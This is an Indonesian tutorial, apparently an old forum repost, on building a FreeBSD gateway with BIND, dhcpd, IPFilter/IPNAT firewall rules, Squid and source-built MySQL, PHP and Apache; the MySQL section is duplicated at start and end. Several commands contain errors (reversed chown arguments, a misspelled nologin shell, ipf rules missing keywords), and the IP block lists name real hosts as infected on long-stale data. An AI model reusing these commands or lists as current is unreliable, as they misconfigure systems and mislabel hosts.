==Konfigurasi MySQL, PHP dan Apache==

==MySQL==

/configure \
--localstatedir=/var/db/mysql \
--with-unix-socket-path=/var/run/mysql.sock \
--host=i686 \
--enable-assembler \
--with-libwrap \
--with-berkeley-db \
--with-named-z-lib \
--with-mysqld-ldflags=-all-static \
--with-client-ldflags=-all-static \
--without-debug \
--without-bench \
--without-docs \
--without-readline

make; make install

Tambahkan user mysql dengan ID misalkan = 3036

pw add group mysql -g 3036
pw add user mysql -u mysql -g mysql -wno -s /sbin/nologint -d /var/db/mysql -c "MySQL"

Direktori localstatedir (/var/db/mysql) diatas, *harus* read/write by user mysql:
chown -R /var/db/mysql mysql:mysql

==PHP==
Sebelumnya kita harus cd ke source apache dulu: cd /usr/local/src/apache, lalu jalankan ./configure (plain).

Kemudian baru cd ke source php: cd /usr/local/src/php dan mengkonfigurasi php sesuai preferensi kita.

/configure \
--build=i686 \
--prefix=/usr/local \
--with-mysql=/usr/local \
--with-apache=../apache \
--with-pcre-regex=/usr/local \
--with-mcrypt \
--with-zlib \
--with-ftp \
--enable-track-vars \
--enable-ctype

make; make install

==Apache==

/configure \
--enable-module=most \
--enable-shared=max \
--server-uid=www \
--server-gid=www \
--activate-module=src/modules/php4/libphp4.a

make; make install

==Penutup==

Sesuai dengan tujuan utama tulisan ini, beberapa sub-sistem mungkin hanya sedikit atau sama sekali tidak dibahas, bagian-bagian tersebut dianggap sesuai dengan instalasi default.
Terakhir, penulis dengan senang hati akan menerima kritik dan saran dari pembaca semua, semoga ada manfaatnya.

aa, aa.delphi@yahoo.com

URL: http://opensource.telkomspeedy.com/forum/viewtopic.php?pid=22122

Mengoptimalkan kemampuan firewall dan proxy server FreeBSD dalam sebuah network sederhana yang hanya memiliki satu IP global

2008-07-27T03:54:09Z

Aa: /* Konfigurasi named.conf yang perlu ditambahkan (atau dirubah): */

Sumber: aa, aa.delphi@yahoo.com
URL: http://opensource.telkomspeedy.com/forum/viewtopic.php?pid=22122

Dalam tulisan ini akan dibahas (mudah-mudahan) secara cukup detail, bagaimana mengoptimalkan kemampuan firewall dan proxy server FreeBSD dalam sebuah network sederhana yang hanya memiliki satu IP global, baik dinamik maupun statik (dial-up PPP, Cable-Modem atau DSL).

Model network seperti ini merupakan model yang sangat umum digunakan oleh warnet serta perusahaan kecil yang berniat untuk memberikan akses internet yang murah meriah bagi para karyawannya.

Teknik yang akan dibahas ini merupakan salah satu (mungkin merupakan yang terbaik) dibandingkan dengan alternatif lainnya seperti menggunakan hardware tertentu (modem dengan kapabilitas internet sharing), kelemahan: jumlah host sangat terbatas, antara 2 - 8, serta fleksibilitasnya sangat rendah, hampir tanpa menggunakan pengamanan dari intruder.

Pilihan lainnya adalah dengan sistem operasi MS Windows (yang sudah sangat familiar), fleksibilitas cukup, namun dengan tingkat pengamanan yang relatif rendah.

Pilihan OS lainnya seperti Linux, OpenBSD atau Solaris bisa juga diperhitungkan, namun overall performance, kombinasi FreeBSD dan IPF adalah yang terbaik dinilai dari segi keamanan/security, performansi, dukungan resources (software, kompatibilitas, utilitas dan dokumentasi) yang tersedia, serta biaya yang dibutuhkan. Dengan FreeBSD mesin 386 tua milik kita disulap menjadi sebuah server yang powerful, robust dan tahan banting.

cat: IPF (IPFilter) adalah paket firewal native dari OpenBSD, sistem operasi yang selama ini dinilai sebagai salah satu OS yang dianggap paling secure.

==Topologi Network==
<pre>
===============================================

_____
| ISP |
|_____|
DNS: 202.155.0.10, 202.155.0.20
|
| 10.20.30.40
___|___
|FreeBSD|...........
|_______| Virtual-Host 192.168.2.1
my.domain.box| Gateway
192.168.1.1 | Firewall - IPF/IPNAT
| DNS Server - BIND
Network: | HTTP Server - Apache
192.168.1.0 | Proxy Server - Squid
255.255.255.0| SQL Server - MySQL
|
|
_________|____...___
| | | |
__|__ __|__ __|__ __|__
Host1 Host2 Host3 HostN
</pre>

Ada 3 pokok bahasan utama dalam kasus ini.
# DNS
# DHCP Server
# IPF/IPNAT

lain-lain: Apache, MySQL dan Squid tidak akan dibahas panjang karena tidak esensial dalam konteks ini.

==DNS==

Untuk mengaktifkan name server jalankan /stand/sysinstal pilih menu Configure, kemudian Startup, lalu aktifkan (enable) named. Jika anda ingin menjalankan named dalam sandbox, isi named flags dengan argumen seperti dalam uraian butir 1.3.

Cara lainnya adalah dengan mengedit langsung /etc/rc.conf, ganti atau tambahkan entri di

/etc/rc.conf:
named_enable="yes"
named_flags="" #lihat uraian selanjutnya

==Cache-Only DNS Server==

Konfigurasi DNS yang paling sederhana, yang kemungkinan besar akan berjalan lancar adalah menggunakan konfigurasi jenis cache-only DNS Server, artinya server DNS kita TIDAK memiliki otoritas atas satu zone-pun juga kecuali localhost dan loopback network 127.

Kekurangan dari model DNS Server seperti ini adalah, tentu saja, host-host dalam network kita tidak dapat saling mengenal. Hal ini bisa kita uji dengan perintah ping dari satu host terhadap host lainnya.

cat.: Dalam terminologi BIND, zone adalah suatu area network dimana sebuah server DNS memiliki otoritas atas pengaturan nama atas host-host yang ada di dalamnya.

Untuk network yang relatif sederhana seperti pada small-office atau di organisasi kecil, suatu zone umumnya hanya berupa satu domain, sementara di organisasi yang cukup besar, seperti di lingkungan kampus dan terutama di sebuah ISP, biasanya sebuah server DNS akan menangani suatu zone yang terdiri atas lebih dari satu domain.

==Konfigurasi dalam named.conf==
<pre>
options {
directory "/etc/namedb";
forwarders {
// daftar DNS Server ISP kita misalnya:
202.155.0.10;
202.155.0.20;
};
};

zone "0.0.127.in-addr.arpa" {
type master;
file "localhost.rev";
};

zone "." {
type hint;
file "root.servers";
};
</pre>

==File-file database==

==File localhost.rev:==

@TTL 3600
@ IN SOA my.domain.box. root.domain.box. (
3600,900,36000,3600
)
IN NS my.domain.box.
1 IN PTR localhost.domain.box.

cat.: Untuk menghindari salah ketik, sebaiknya kita cukup menjalankan perintah: sh make-localhost di direktori /etc/namedb.

==File root.servers:==
File ini tidak perlu dirubah, biarkan saja sesuai defaultnya.

==Internal-Root DNS Server==
Seperti dapat dilihat pada gambar diatas, network kita termasuk kedalam network kelas C, dengan alamat 192.168.1.0 dan netmask 255.255.255.0. IP address network card pertama (if_1) ditetapkan oleh ISP, sementara if_2 dapat kita tentukan sendiri.

Selanjutnya kita dapat menetapkan hal-hal sebagai berikut:

Zone/domain: domain.box
Reverse-Network: 1.168.192.in-addr.arpa
Server address: 192.168.1.1
Server name: my.domain.box

==Konfigurasi dalam named.conf:==

==Konfigurasi awal (Cache-Only DNS Server):==
<pre>
options {
directory "/etc/namedb";
forwarders {
// daftar DNS Server ISP:
202.155.0.10;
202.155.0.20;
};
version "19.09.1969";
};

zone "0.0.127.in-addr.arpa" {
type master;
file "localhost.rev";
};
</pre>

==Konfigurasi named.conf yang perlu ditambahkan (atau dirubah):==
<pre>
forward;

zone "domain.box" {
type master;
file "box/domain.db";
};

zone "1.168.192.in-addr.arpa" {
type master;
file "box/domain.rev";
};

zone "." {
type hint;
//file "root.servers";
file "box/root.box";
};
</pre>

==File-file database==

==File localhost.rev:==

Tidak perlu ada perubahan dalam file ini, sama dengan butir 1.1.2.1 diatas.

==File domain.db:==

Berisi daftar translasi name to address untuk seluruh host yang ada di domain domain.box, hati-hati character comment di sini adalah semi-colon (;) bukan hash (#).

@TTL 3600
@ IN SOA my.domain.box. root.domain.box. (
3600,900,36000,3600
)
IN NS my.domain.box.

localhost IN A 127.0.0.1

my IN A 192.168.1.1
host1 in cname my
host2 IN A 192.168.1.2
host3 IN A 192.168.1.3
..
..
..
host254 IN A 192.168.1.254

cat.: Perhatikan bahwa dalam database ini kita perlu menambahkan entri untuk localhost, sehingga setiap rujukan atas localhost, dari manapun juga, akan diarahkan ke loopback masing-masing.

==File domain.rev:==
Kebalikan dari domain.db, merupakan reverse address to name atas domain.box untuk network 192.168.1.0/24

@TTL 3600
@ IN SOA my.domain.box. root.domain.box. (
3600,900,36000,3600
)
IN NS my.domain.box.

1 IN PTR my
2 IN PTR host1
3 IN PTR host2
..
254 IN PTR host254

cat.: Perhatikan bahwa tidak bisa dilakukan reverse untuk alias atau CNAME (canonical-name). Tidak diperbolehkan terdapat *dua entri yang sama* untuk *satu nomor address*, atau dengan kata lain, satu nomor adress tidak boleh merujuk kepada dua nama yang berbeda. Sebaliknya bisa saja terdapat dua nomor address untuk satu nama, misalnya jika kita memiliki dua atau lebih network card dalam satu host yang masing-masing memiliki IP sendiri.

==File root.box:==

File ini merupakan modifikasi dari file root.servers, yaitu dengan menambahkan RR (Resource Record) yang menyatakan bahwa server kita memiliki otoritas atas root domain.

@TTL 3600
@ IN SOA my.domain.box. root.domain.box. (
3600,900,36000,3600
)
IN NS my.domain.box.

;domain "domain.box" didelegasikan langsung dari root
domain.box. 9999999 IN NS my.domain.box.

;juga reverse dari class-C network
1.168.192.in-addr.arpa 9999999 IN NS my.domain.box.

;glue records
my.domain.box. IN A 192.168.1.1

;daftar root server selanjutnya sama dengan default di file root.servers
..

==DNS Server in the sand-box==

Konfigurasi server DNS ini terutama ditujukan untuk memperketat sekuriti sistem network, prinsipnya sederhana, yaitu menjalankan servis DNS (named) oleh non-privilege user, untuk ini biasanya sengaja dibuat satu user khusus, tanpa fasilitas login.
Sebenarnya untuk model network kita yang sederhana, ancaman sekuriti yang ada mungkin tidak akan terlalu serius. Konfigurasi ini bisa jadi sebagai opsi yang bisa diambil ataupun tidak.

1.3.1
Buat user baru untuk servis DNS, misalnya dengan nama: bind.
User group: bind (default)
User home: /usr/local/bind
shell: no, nologin atau nonexistent

1.3.2
ganti atau tambahkan entri di /etc/rc.conf:
named_flags="-u bind -g bind -w /usr/local/bind -c named.conf -t /usr/local/bind"

Penjelasan atas argumen:
-u dan -g: user serta group yang menjalankan servis DNS adalah "bind".
-w dan -c: direktori kerja dan nama file konfigurasi yang dipakai.
-t: setelah melakukan inisialisasi, servis DNS menjadikan /usr/local/bind
sebagai root direktorinya (chroot).

Dengan penggantian user, group dan chroot, servis DNS ini tidak lagi memiliki akses tak-terbatas atas resources, sehingga perlu dilakukan lagi beberapa penyesuaian:

1.3.2.1

Servis named dan ndc biasanya menampilkan prosess-id-nya dibawah sub-direktori /var/run, karena root-directory-nya berubah, maka kita harus membuat secara manual subdirektori /var/run dibawah /usr/local/bind, jangan lupa ownershipnya harus disesuaikan menjadi bind:bind

1.3.2.1

Jika penyesuaian sub-direktori diatas tidak dilakukan maka setidaknya harus dibuat penyesuaian dalam option named.conf:
[pre]
options {
...

directory "/"; //(atau mudahnya hapus saja option ini)
pid-file "named.pid" //named.pid berada di direktori root yang baru

...
}
[/pre]

1.3.3

Pindahkan atau salin /etc/namedb ke /usr/local/bind.

cat.: Perhatikan ownership dari /usr/local/bind, jika kita menyalinnya dengan tool atau file-manager seperti midnight- commander, biasanya ownership akan berubah dari bind ke root (atau privileged user pada saat itu), sehingga harus dikembalikan lagi dengan chown -r bind:bind /usr/local/bind.

Penyesuaian ownership ini juga berlaku untuk direktori baru dibawahnya yang kelak digunakan untuk file-file yang meminta akses-tulis seperti log, dump, stat, pid, dsb.

1.3.4
[pre]
Hentikan proses named yang saat itu berlangsung (dengan kill, killall atau top), lalu aktifkan kembali named (dengan argumen seperti named_flags diatas), atau reboot server.
[/pre]

2. DHCP Server

2.1. Instalasi dan Setup

Dengan /stand/sysinstall, install package isc-dhcpd.
Instalasi ini hanya sekedar mengekstrak program dan dokumentasi dhcpd, kita *harus* membuat sebuah file yaitu /var/db/dhcpd.lease secara manual: touch /var/db/dhcpd.leases.
Edit file /usr/local/etc/dhcpd.conf dengan editor kesayangan anda, fi-ay :), dan buat alokasi dinamis IP addresses untuk network 192.168.1.0/24 misalnya:

#jangan lupa menggunakan fasilitas syslog
#dalam syslog.conf tambahkan entry sbb:
# local7* /var/log/dhcpd.log #awas: pake TAB, jangan pake spasi!

log-facility local7;
authoritative;
ddns-update-style ad-hoc;

option domain-name "domain.box";

subnet 192.168.1.0 netmask 255.255.255.0 {
option netbios-name-servers 192.168.1.3; #server NT kita
option domain-name-servers 192.168.1.1;
option routers 192.168.1.1;
pool { range 192.168.1.10 192.168.1.190; }
}

2.2. Menjalankan dhcpd
DHCP server sebaiknya dijalankan pada saat boot-up dengan membuat file startup di /usr/local/etc/rc.d
Untuk menjalankan secara manual ketikan perintah: dhcpd if_2 (if_2 adalah interface yang terhubung dengan network lokal)

3.IPF/IPNAT

'Official' firewall dari FreeBSD adalah ipfw/natd, kelebihan ipfw terutama adalah kemampuan untuk mengatur kuota bandwith, sementara kelebihan ipf/ipnat yang paling utama adalah performansi. Juga menurut authornya, ipf benar-benar melakukan kontrol terhadap TCP/IP state, tidak cuma artifisial (sekedar mengecek kombinasi flags tertentu seperti SYN/ACK) seperti yang dilakukan dalam paket firewall lainnya.

Dalam bahasan kali ini, kita akan menggunakan IPFilter/IPNAT.

3.1. Kompilasi kernel

Untuk memasang firewall kita harus mengkompile ulang kernel (selanjutnya kita bisa mencopot-pasang lagi lewat loadable kernel module).

3.1.1 Konfigurasi kernel

cd /usr/src/sys/i386/conf
option tambahan kernel kita dari GENERIC adalah sbb:

#--- start kernel options ---
#hapus semua options cpu kecuali model tertinggi sesuai cpu anda
#cpu I386_CPU
#cpu I486_CPU
#cpu I586_CPU
cpu I686_CPU
maxusers 32

#kostumisasi kernel (lihat juga catatan tambahan)
ident AA
makeoptions KERNEL=AA

#jangan lupa mengganti entri di /boot atau /etc/defaults/rc.conf
#userconfig_script_load="YES"
#kernel="/AA"
#verbose_loading="YES"
#autoboot_delay="3"
#bootfile="AA,aa,kernel"

#kita tidak memakai 386SX kebawah, jadi emulasi mathco bisa dihapus saja
#options GPL_MATH_EMULATE #Support for x87 emulation

#console menggunakan teks mode 90x60
device vga0 at isa?
options VGA_WIDTH90 #90 baris VGA
options VESA

#jangan lupa nanti tambahkan font dan screenflags di /etc/rc.conf sbb:
#font8x14="cp437-8x14"
#font8x16="cp437-8x16"
#font8x8="cp437-8x8"
#allscreens_flags="VGA_90x60"

#hapus splash screen/screen saver.
#pseudo-device splash

#selain UFS, dalam box kita terdapat juga NTFS dan EXT2FS
options NTFS #NT
options EXT2FS #Linux
options NFS_NOSERVER #Membuang kode NFS

#options UNION #UFS bisa digabung
#options NULLFS #null
#options UMAPFS #UID Map FileSystem
#options KERNFS #kernel
#options SMBFS #SMB/File Sharing ala Windows
#options PROCFS #memetakan Process ID

# Tambahkan flags 0xb0ff (maks. drive blok transfer) untuk hard-disk
# untuk sepasang hard-disk per-interface flagsnya adalah 0xb0ffb0ff
device ata0 at isa? port IO_WD1 irq 14 flags 0xb0ffb0ff
device ata1 at isa? port IO_WD2 irq 15 flags 0xb0ffb0ff

options SOFTUPDATES #penting untuk meningkatkan performansi
options ATA_STATIC_ID #Static device numbering

#hapus saja tape-drive.
#device atapist # ATAPI tape drives

# jika menggunakan APM, sebaiknya tidak.
#device apm0 at nexus? disable flags 0x20 # Advanced Power Management

# PCCARD (PCMCIA) support, buang saja
#device card
#device pcic0 at isa? irq 0 port 0x3e0 iomem 0xd0000
#device pcic1 at isa? irq 0 port 0x3e2 iomem 0xd4000 disable

#Buang saja serial 2 dan 3
#device sio2 at isa? disable port IO_COM3 irq 5
#device sio3 at isa? disable port IO_COM4 irq 9

#Buang juga koneksi lewat Parallel port
#device plip # TCP/IP over parallel
#device ppi # Parallel port interface device
#device vpo # Requires scbus and da

#Buang semua entri ethernet yang tidak ada
#saya cuma punya 3Com 3C509, 3C905 dan realtek
device ep # 3Com 3C509 (10 MBps)
device xl # 3Com 3c905 (10/100)
device rl # RealTek 8129/8139 (10/100)
#device de # Realtek lama (10)

#Banyak software yang tergantung kepada bpf
#(discouraged), tapi sebaiknya tetap dipasang
pseudo-device bpf #Berkeley packet filter

#Buang semua options USB yang hardwarenya tidak ada
device uhci # UHCI PCI->USB interface
device ohci # OHCI PCI->USB interface
device usb # USB Bus (required)
device ugen # Generic
#device uhid # "Human Interface Devices"
#device ukbd # Keyboard
#device ulpt # Printer
#device umass # Disks/Mass storage - Requires scbus and da
#device ums # Mouse
#device uscanner # Scanners
# USB Ethernet, requires mii
#device aue # ADMtek USB ethernet
#device cue # CATC USB ethernet
#device kue # Kawasaki LSI USB ethernet

#Soundcard (generik)
device pcm

#jangan lupa nanti untuk membuat entri2 sound
#(audio, mixer, sequencer dll) di /dev:
#cd /dev
#./MAKEDEV snd

#Intel PIIX4 Power Management Unit
#device smbus
#device intpm

#Berhubung SCSI card saya sudah sangat kuno, akhirnya saya cabut :)
#Jika tidak memiliki SCSI, semua options yang behubungan dengan skasi
#bisa dibuang

#options SCSI_DELAY=8000 #Delay (in ms) before probing SCSI
# SCSI Controllers
#...
# SCSI peripherals
#...

#Jika menggunakan firewall bawaan FreeBSD:
#options IPFIREWALL
#options IPDIVERT
#options IPFIREWALL_VERBOSE
#options IPFIREWALL_VERBOSE_LIMIT=32
#options IPFIREWALL_DEFAULT_TO_ACCEPT

#Jika anda memasang bandwith quota tambahkan entri dibawah ini
#options IPDIVERT #digunakan juga oleh ipfw/natd
#options DUMMYNET
#options QUOTA

#Konfigurasi ipfilter/ipnat ini yang kita pakai
#cat. jika menggunakan IPFilter TIDAK PERLU ditambahkan
#lagi options IPDIVERT seperti yang terdapat dalam
#beberapa dokumentasi online

options IPFILTER
options IPFILTER_LOG
options IPFILTER_DEFAULT_BLOCK

#untuk memperketat firewall bisa ditambahkan options dibawah ini:
options IPSTEALTH
options TCP_DROP_SYNFIN
options TCP_RESTRICT_RST

options MROUTING
options RANDOM_IP_ID

#beberapa options lainnya untuk memacu performa
options NBUF=4096
options NMBCLUSTERS=8192

#catatan tambahan:

#Jika anda ingin mengubah release, copyright et-al., lakukan perubahan ini
#di /usr/src/sys/conf/newvers.sh

#dari original
#TYPE="FreeBSD"
#REVISION="4.3"
#BRANCH="RELEASE"
#RELEASE=4.3-RELEASE
#VERSION="${TYPE} ${RELEASE}"
if [ X"$COPYRIGHT" = X ]; then
COPYRIGHT="/*
* Copyright (c) $year
* FreeBSD Inc. All rights reserved.
*
*/"
fi

#menjadi violated
TYPE="mbakNunix"
REVISION="1.31"
BRANCH="BURIX"
RELEASE=1.31-BURIX
VERSION="${TYPE} ${RELEASE}"
COPYRIGHT="
/*** aa, aa.delphi@yahoo.com, 1995-$year ***/
"

2.1.2 Kompilasi

Akhirnya kita kompile kernel sbb:

su (kita harus root)
cd /usr/src/sys/i386/conf
chflags noschg AA (jika sekuriti diperketat, biasanya kernel diberi flag schg)

/usr/sbin/config -r AA && \
cd ../../compile/$1 && \
(make depend) 2>~/err1 && \
make 2>~/err2 && \
(make install) 2>~/err3

semua error message masing-masing akan dicatat di /root, file: err1, err2 dan err3

3.2. Mengkonfigurasi IPF/IPNAT

3.2.1. Konfigurasi rc.conf
Konfigurasi umum seperti biasa dilakukan di rc.conf

3.2.2. Konfigurasi syslog.conf

3.2.3. Tuning sysctl.conf
net.inet.ip.forwarding=1
net.inet.ip.fastforwarding=1

3.2.4. ipnat.rules
Rules untuk IPNAT dibahas lebih dulu karena relatif jauh lebih sederhana daripada rules untuk IPF

Catatan:
map artinya: remap SOURCE packet's IP address
rdr artinya: redirect DESTINATION of packet's IP address

Tambahkan baris berikut untuk mengemap :) port ftp

map rl1 192.168.1.0/24 -> 0/32 proxy port 21 ftp/tcp
map rl1 192.168.1.0/24 -> 0/32 portmap tcp/udp 49152:65535 #nomor port bebas antara 0-65535
map rl1 192.168.1.0/24 -> 0/32

HTTP request di redirect ke server

rdr rl1 0/32 port 80 -> 192.168.1.1 port 80 tcp

#jika perlu permintaan http dari lokal bisa di redirect ke SQUID port 3128
#rdr rl0 0.0.0.0/0 port 80 -> 192.168.1.1 port 3128 tcp

3.2.5. ipf.rules

Default konfigurasi adalah block in all, block out all artinya dengan konfigurasi seperti ini server kita benar-benar jadi mahluk egois, tidak mau melihat kanan-kiri sedikitpun :)

konfigurasi paling sederhana yang bisa berjalan adalah:

pass in all
pass out all

Artinya sama saja dengan tidak memasang firewall.

jika server kita hanya digunakan untuk mengakses internet keluar (outward-only), cukup kita isi firewall rules dengan satu baris:

pass out quick all keep state keep frags

untuk ipf ver 4.32 (FreeBSD 4.5+) rule "keep" tidak bisa diterapkan kepada paket selain tcp/udp/icmp, jadi rule diatas dibagi menjadi:

pass out quick proto tcp/udp all keep state keep frags
pass out quick proto icmp all keep state keep frags
pass out quick all

Dengan menggunakan keep state, kita tinggal membuka port yang kita perlukan saja, lalu-lintas koneksi yang terkait dengan servis/port tsb selanjutnya ditangani oleh ipf, misalnya:

block in quick all
pass out quick proto icmp all icmp-type echo keep state

meski diatas terdapat block, icmp-reply akan tetap bisa masuk masuk karena memang diminta oleh icmp-echo.
pada protokol tcp/udp lainnya, pembukaan gerbang masuk ini mencakup juga control messages berupa icmp atau bahkan segmen IP dengan nomor port lainnya yang berbeda, yang masih terkait dalam koneksi tersebut.

catatan tambahan:
Sebaiknya keep-state jangan terlalu di-obral supaya tidak menghabiskan resources atau bahkan membuka celah security berupa Denial of Service (DoS) Attack, lebih tepat kiranya jika hanya protokol TCP dengan SYN Flag serta port-port tertentu saja yang dipasangi keep-state seperti FTP (21), SSH (22), SMTP (25), DNS (53), DHCP (67/58), serta ICMP echo.
Jika hanya permintaan koneksi (ditandai dengan SYN flag) dari servis/port tertentu yang dibuka, jalur masuk semua ditutup (block in all), port FTP mau tidak mau harus diberi keep state karena setelah koneksi terjadi dia akan membuka port/jalur baru (UDP port 20, atau TCP dengan unassigned [high number] port) untuk komunikasi data.

pass out quick proto tcp flags S keep state
pass out quick proto udp port = 53 keep state
pass out quick proto icmp all icmp-type echo keep state
pass out quick all

Karena pembahasan ipf ini cukup panjang, maka akan kita singkat saja dengan menggunakan rules yang berguna secara umum

[pre]
#UMUM
pass in quick on lo0
pass out quick on lo0

#NBNS
block return-rst in quick proto tcp all port 136 >< 140
block return-icmp-as-dest(port-unr) in quick all port 136 >< 140

#============================================================
#if_1 adalah eksternal interface (yang terhubung ke internet)
#============================================================

#INWARD
#------
block in quick on if_1 all head 10000
#Start group 10000

block in quick all with opt lsrr group 10000 #block loose src routing
block in quick all with opt ssrr group 10000 #block strict src routing
block in quick proto tcp all with frags group 10000

#block no. ip address yang diketahui berbahaya, bervirus dsb.
#block in quick proto tcp/udp from Danger_IPs group 10000
#(lihat daftar 3.2.5.2)

pass in quick proto tcp all port = http flags S keep state group 10000 #jika kita pasang web server

block in quick proto icmp all head 11000 group 10000 #blok icmp yang tidak perlu
#Start group 11000
#pass in log first quick proto icmp all icmp-type echo group 11000
pass in quick proto icmp all icmp-type echorep group 11000
pass in quick proto icmp all icmp-type unreach group 11000
pass in quick proto icmp all icmp-type redir group 11000
pass in quick proto icmp all icmp-type timex group 11000
block in return-icmp-as-dest(host-unr) in quick all group 11000
#End group 11000

#__________________________________________________
block return-rst in quick proto tcp all group 10000
block return-icmp-as-dest(port-unr) in quick all group 10000

#End group 10000

#OUTWARD bebas
#-------------
block out quick on if_1 all head 20000
pass out quick proto tcp/udp all keep state keep frags group 20000
pass out quick proto icmp all keep state keep frags 20000
pass out quick all 20000

#===========================================================
#if_2 adalah internal interface (yang terhubung ke intranet)
#===========================================================

#INWARD
#------
block in quick on if_2 all head 30000
#Start group 30000

#Test User, tahan uninitialized host
block in quick from !192.168.1.1/24 to any head 31000 group 30000
#Start group 31000

#Unknown User, harus daftar dhcp dulu
pass in log first quick proto tcp/udp from any port = 68 to any port = 67 group 31000
block return-icmp-as-dest(host-unk) in log first quick all group 31000 #Unknown

#HTTP
#Tahan dulu http untuk diinterogasi, mau kemanakah tujuannya.
block in log first quick all port = http head 32000 group 31000
#Start group 32000

#HTTP block template: popups, junker, spammer etc. dilarang!
block return-rst in log first quick proto tcp from any to 64.38.238.0/18 group 32000 #ADS!
block return-rst in log first quick proto tcp from any to 66.28.153.36/24 group 32000 #porn&spy!
#...dst (lihat daftar 3.2.5.1 yang berisi IP popups/spyies)

#aman...
pass in log first quick proto tcp all flags S keep state keep frags group 32000

#HTTP-TCP only, yg lainnya di-blok by default!
block return-rst in quick proto tcp all group 32000

#End group 32000
#End group 31000

#Pada tahap ini user telah dikenal (dari 192.168.1.1/24) dan dengan permintaan port selain http
#atau user dari 192.168.1.1/24 dengan port http namun protokolnya selain tcp

#Tahan permintaan DNS keluar
block return-icmp-as-dest(filter-prohib) in quick proto tcp/udp from any to 202.155.0.10/24 port = domain group 30000

pass in log first quick proto tcp/udp all port < 1024 keep state group 30000 #regular ports
pass in log first quick proto tcp/udp all port = 3130 keep state group 30000 #SQUID
pass in log first quick proto tcp/udp all port = 3306 keep state group 30000 #MySQL

#__________________________________________________
#lainnya secara default di-blok
block return-rst in quick proto tcp all group 30000
block return-icmp-as-dest(port-unr) in quick all group 30000

#End group 30000

#OUTWARD bebas
#-------------
block out quick on if_2 all head 40000
pass out quick proto tcp/udp all keep state keep frags 40000
pass out quick proto icmp all keep state keep frags 40000
pass out quick all 40000
[/pre]

3.2.5.1 Daftar alamat IP popup
Berikut ini daftar ip popup dan advertising banner, spy, spammer dll yang selain menyebalkan juga kadang berbahaya.
cat.: ganti kata "BLOK" dengan: "block return-rst in log first quick proto tcp from any to", juga nomor group disesuaikan dengan konfigurasi

#HTTP block template

#Hall Of Fames - top of sh*ts!-
BLOK 64.38.238.0/18 group 42000 #popups.ini
BLOK 64.38.223.51/24 group 42000 #!!!trafficcashgold.com
BLOK 64.38.226.6/24 group 42000 #maxcash.cavecreek.net
BLOK 64.38.247.60/24 group 42000 #count1-old.paycounter.com[]
BLOK 205.180.85.40/24 group 42000 #popups.ini TOP!!! media.fastclick.net
BLOK 202.180.8.129/24 group 42000 #ns1.servercyber.com
BLOK 207.68.178.251/24 group 42000 #ads.msn.com
BLOK 207.68.185.58/24 group 42000 #autosearch.msn.com
BLOK 207.68.171.254/24 group 42000 #adobe-spy
BLOK 207.68.172.253/24 group 42000 #adobe-spy
BLOK 207.68.173.254/22 group 42000 #adobe-spy
BLOK 209.225.0.6/24 group 42000 #servedby.advertising.com
BLOK 209.225.4.72/24 group 42000 #advertising.com

#telkom!dont-block: BLOK 203.130.252.36/24 group 42000 #mencurigakan sih

#dangerous!
BLOK 66.28.38.3/24 group 42000 #
BLOK 209.50.252.100/24 group 42000 #4bigcash.com
BLOK 209.5.187.10/24 group 42000 #freepopups.com
#BLOK 209.5.187.16/24 group 42000 #adpowerzone.com
#BLOK 213.249.1.67/24 group 42000 #d67.kif2.nas.panafonet.gr
#End dangerous

#from popups.ini
BLOK 12.42.235.3/24 group 42000 #popups.ini
#...long-list...
BLOK 216.95.228.15/24 group 42000 #popups.ini
#end-from popups.ini

#new compilation
#BLOK 66.206.15.201/24 group 42000 #indo-porn, gapapa-lah
BLOK 63.167.204.56/24 group 42000 #7adpower.com
#...long-list...
BLOK 128.11.42.61/24 group 42000 #burstnet.com
#dont-block-yahoo: BLOK 66.218.71.80/24 group 42000 #w1.scd.yahoo.com
#end-new compilation

#old compilation
BLOK 12.90.179.10/16 group 42000
BLOK 63.215.149.25/24 group 42000 #porno
BLOK 192.150.10.120/16 group 42000 #adobe spyier!!!
#...long-list...
BLOK 216.218.220.42/24 group 42000 #servergold.com - porn
#beware! Namezeroes are always peeking our nbns port!
BLOK 216.34.13.245 port != 80 group 42000

#end-old-compilation

3.2.5.2 Daftar alamat IP berbahaya
Berikut ini daftar alamat IP berbahaya karena menyebarkan virus nimda atau code-red hingga tulisan ini dibuat (mungkin IP anda tercantum disini, selamat! :)).
penggunaannya dalam ipf.rules misalnya:

block return-rst in log first quick on rl1 proto tcp from 202.10.35.227 to any Group 23456 #Nimda

4.47.218.144#code_red

#internal INDOSAT NET-10.X.X.X
10.1.8.108#nimda
10.6.2.4#nimda
#...long-list...
10.6.18.68#nimda
#end: internal INDOSAT NET-10.X.X.X

24.73.201.22#code_red
24.80.172.120#code_red
#...long-list...
24.196.16.168#code_red
219.8.104.74#nimda

4.Lain-lain
Dalam bagian ini diasumsikan bahwa kita akan menginstal program dari source kodenya, yang diekstrak ke direktori /usr/local/src, mis.: tar -xpvzf apache.tgz -C /usr/local/src.
bagian version number, jika ada, sebaiknya dihilangkan, mis.: mv apache-1.1.23pl8 apache

4.1. Squid
/configure --enable-ipf-transparent \

#parameter lain yang perlu:
--prefix=/usr/local \
--bindir=\${prefix}/sbin \
--libexecdir=\${prefix}/libexec \
--sysconfdir=\${prefix}/etc/squid \

#parameter lain yang mungkin perlu:
--enable-storeio="ufs diskd null" \
--enable-removal-policies="lru heap" \

#parameter tambahan:
--localstatedir=\${prefix}/squid \
--host=i686 \
--disable-ident-lookups \
--disable-wccp \
--enable-kill-parent-hack \
--enable-time-hack \
--with-pthreads

make all; make install

Dengan parameter diatas kita akan memperoleh konfigurasi squid yang mirip seperti jika kita menginstalnya melalui package.
Kemudian file logs dan cache di direktori /usr/local/etc/squid di chown nobody:nogroup (atau sesuai dengan usernya jika telah dibuat user untuk squid, seperti user mysql dibawah).
Setelah itu kita buat intial cache directory dengan menjalankan: squid -z. Default cache size adalah 100MB.

==Konfigurasi MySQL, PHP dan Apache==

==MySQL==

/configure \
--localstatedir=/var/db/mysql \
--with-unix-socket-path=/var/run/mysql.sock \
--host=i686 \
--enable-assembler \
--with-libwrap \
--with-berkeley-db \
--with-named-z-lib \
--with-mysqld-ldflags=-all-static \
--with-client-ldflags=-all-static \
--without-debug \
--without-bench \
--without-docs \
--without-readline

make; make install

Tambahkan user mysql dengan ID misalkan = 3036

pw add group mysql -g 3036
pw add user mysql -u mysql -g mysql -wno -s /sbin/nologint -d /var/db/mysql -c "MySQL"

Direktori localstatedir (/var/db/mysql) diatas, *harus* read/write by user mysql:
chown -R /var/db/mysql mysql:mysql

==PHP==
